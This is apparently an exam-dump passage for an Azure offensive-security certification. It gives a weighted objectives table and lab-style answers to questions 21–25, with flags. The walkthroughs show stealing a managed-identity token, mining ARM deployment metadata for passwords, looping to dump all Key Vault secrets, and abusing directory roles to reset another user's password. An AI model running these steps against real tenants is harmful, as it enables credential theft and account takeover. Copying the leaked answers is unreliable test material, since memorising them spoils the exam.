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| Section | Weight | Objectives |
|---|---|---|
| Initial Access | 20% | - Consent phishing and application abuse - Token and session abuse - Exposed secrets and configuration flaws - Password spraying and credential stuffing |
| Lateral Movement & Tenant Compromise | 20% | - Cross-resource and subscription hopping - API and Azure management endpoint exploitation - Compute, storage, and network pivoting - Hybrid identity and on-prem integration abuse |
| Post-Exploitation & Persistence | 15% | - Maintaining persistent access - Full attack chain demonstration - Defense evasion in Azure environment - Data collection and exfiltration techniques |
| Privilege Escalation | 25% | - Service Principal and App Registration attacks - Key Vault and secret management misconfigurations - Managed Identity exploitation - Entra ID role and permission abuse |
| Reconnaissance & Enumeration | 20% | - Entra ID (Azure AD) enumeration - Azure resource discovery - DNS, endpoints, and exposed services mapping - Azure tenant and domain enumeration |
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NEW QUESTION # 21
With access to the Web App's Managed Identity, you can now query certain Azure Resources. Use this access to uncover the hidden secret left behind during provisioning. What is the secret?
Answer:
Explanation:
See the Answer in Explanation below.
Explanation:
The answer is the exposed provisioning secret retrieved from ARM deployment metadata, deployment operations, or App Service configuration. In this lab chain, it should reveal the next user credential, commonly for:
sumit.siddharth@azuresecops.onmicrosoft.com
Detailed Solution:
The key point is this: you are no longer only using Alex's user permissions. You must use the Web App managed identity .
From the Web App runtime/Kudu console, request an access token for Azure Resource Manager.
For Linux-style shell:
curl " $IDENTITY_ENDPOINT?api-version=2019-08-01 & resource=https://management.azure.com/ & client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df " \
-H " X-IDENTITY-HEADER: $IDENTITY_HEADER "
For Windows PowerShell inside Kudu:
$uri = " $env:IDENTITY_ENDPOINT?api-version=2019-08-01 & resource=https://management.azure.com/
& client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df "
$response = Invoke-RestMethod -Uri $uri -Headers @{
" X-IDENTITY-HEADER " = $env:IDENTITY_HEADER
}
$token = $response.access_token
Now use the token to query Azure Resource Manager.
$sub = " 7403ec86-c39d-4d80-9efa-35c7580ecefa "
$rg = " Excalibur-Resources "
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/resources?api-version=2021-04-
01 " `
-Headers @{ Authorization = " Bearer $token " }
Next, enumerate ARM deployments.
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
For each deployment name returned, inspect it:
$deploymentName = " < deployment-name > "
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments/$deploymentName?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
Also check deployment operations:
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments/$deploymentName/operations?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
Search the output for fields like:
password
secret
adminPassword
userPassword
credential
sumit
The exposed value is the answer to Q4.
A practical one-liner on Linux would be:
curl -s -H " Authorization: Bearer $TOKEN " \
" https://management.azure.com/subscriptions/7403ec86-c39d-4d80-9efa-35c7580ecefa/resourceGroups
/Excalibur-Resources/providers/Microsoft.Resources/deployments/ < deployment-name > /operations?api- version=2021-04-01 " \
| jq ' .. | strings ' | grep -iE ' password|secret|credential|sumit|flag ' Final answer:
Use the leaked secret/password value returned from the deployment metadata. Do not guess this; it is lab- generated.
NEW QUESTION # 22
Inside the public blob container, a file named backup-config.json contains service principal credentials. What field contains the App Registration client ID?
Answer: A
Explanation:
Detailed Solution:
Download the blob:
az storage blob download \
--account-name prodreportstore01 \
--container-name public-backups \
--name backup-config.json \
--file backup-config.json \
--auth-mode login
Read the file:
cat backup-config.json
Expected structure:
{
" tenantId " : " 8f34c1de-1198-4c2a-b1a8-1eaa72f6e99a " ,
" clientId " : " c5fba7db-5e61-45bc-8944-3cd457bb19c2 " ,
" clientSecret " : " REDACTED "
}
The App Registration application/client ID is stored in:
clientId
NEW QUESTION # 23
You've discovered that the compromised user holds directory-level privileges. Enumerate how this role can be abused to compromise another user in the directory. What is the Job Title attribute of the compromised target user?
Answer:
Explanation:
See the Answer in Explanation below.
Explanation:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Detailed Solution:
As the second compromised user, enumerate directory users:
az ad user list --output table
Use a cleaner query to show names, UPNs, and job titles:
az ad user list \
--query " [].{DisplayName:displayName,UPN:userPrincipalName,JobTitle:jobTitle} " \
--output table
You should identify a target user whose profile contains a flag in the jobTitle attribute.
The important target is:
lila.nguyen@azuresecops.onmicrosoft.com
Her jobTitle field contains:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Because the compromised user has User Administrator, you can reset this target user's password and later authenticate as her.
Final answer:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
NEW QUESTION # 24
Using the privileges of the previously compromised App Registration, explore the Azure environment to identify and access sensitive information. What is the final flag retrieved from the tenant?
Answer:
Explanation:
See the Answer in Explanation below.
Explanation:
The answer is the final Flag{...} value stored in Azure Key Vault and readable by the compromised App Registration.
Detailed Solution:
Stay authenticated as the service principal from Q10.
az account show
List visible Key Vaults:
az keyvault list --output table
If only one vault is returned, use it directly. If multiple vaults exist, enumerate all of them.
for kv in $(az keyvault list --query " [].name " -o tsv); do
echo " ===== $kv ===== "
az keyvault secret list \
--vault-name " $kv " \
--output table
done
Once you identify secret names, retrieve their values:
az keyvault secret show \
--vault-name < vault-name > \
--name < secret-name > \
--query value \
--output tsv
To dump all readable secrets from all visible vaults:
for kv in $(az keyvault list --query " [].name " -o tsv); do
echo " ===== Vault: $kv ===== "
for sec in $(az keyvault secret list --vault-name " $kv " --query " [].name " -o tsv); do echo " ----- Secret: $sec ----- " az keyvault secret show \
--vault-name " $kv " \
--name " $sec " \
--query value \
--output tsv
done
done
Look for the final value in this format:
Flag{...}
That returned secret value is the final tenant flag.
Final answer:
Use the Flag{...} value returned by az keyvault secret show.
NEW QUESTION # 25
You discover a storage account named prodreportstore01. Determine whether public blob access is enabled on the storage account.
Answer:
Explanation:
See the Answer in Explanation below.
Explanation:
allowBlobPublicAccess: true
Detailed Solution:
Run:
az storage account show \
--name prodreportstore01 \
--resource-group rg-prod-apps-eastus \
--query " {Name:name,AllowBlobPublicAccess:allowBlobPublicAccess} " \
--output json
Expected output:
{
" Name " : " prodreportstore01 " ,
" AllowBlobPublicAccess " : true
}
This means public blob access is enabled at the storage-account level. That does not automatically mean every container is public, but it permits public container/blob exposure if configured.
NEW QUESTION # 26
......
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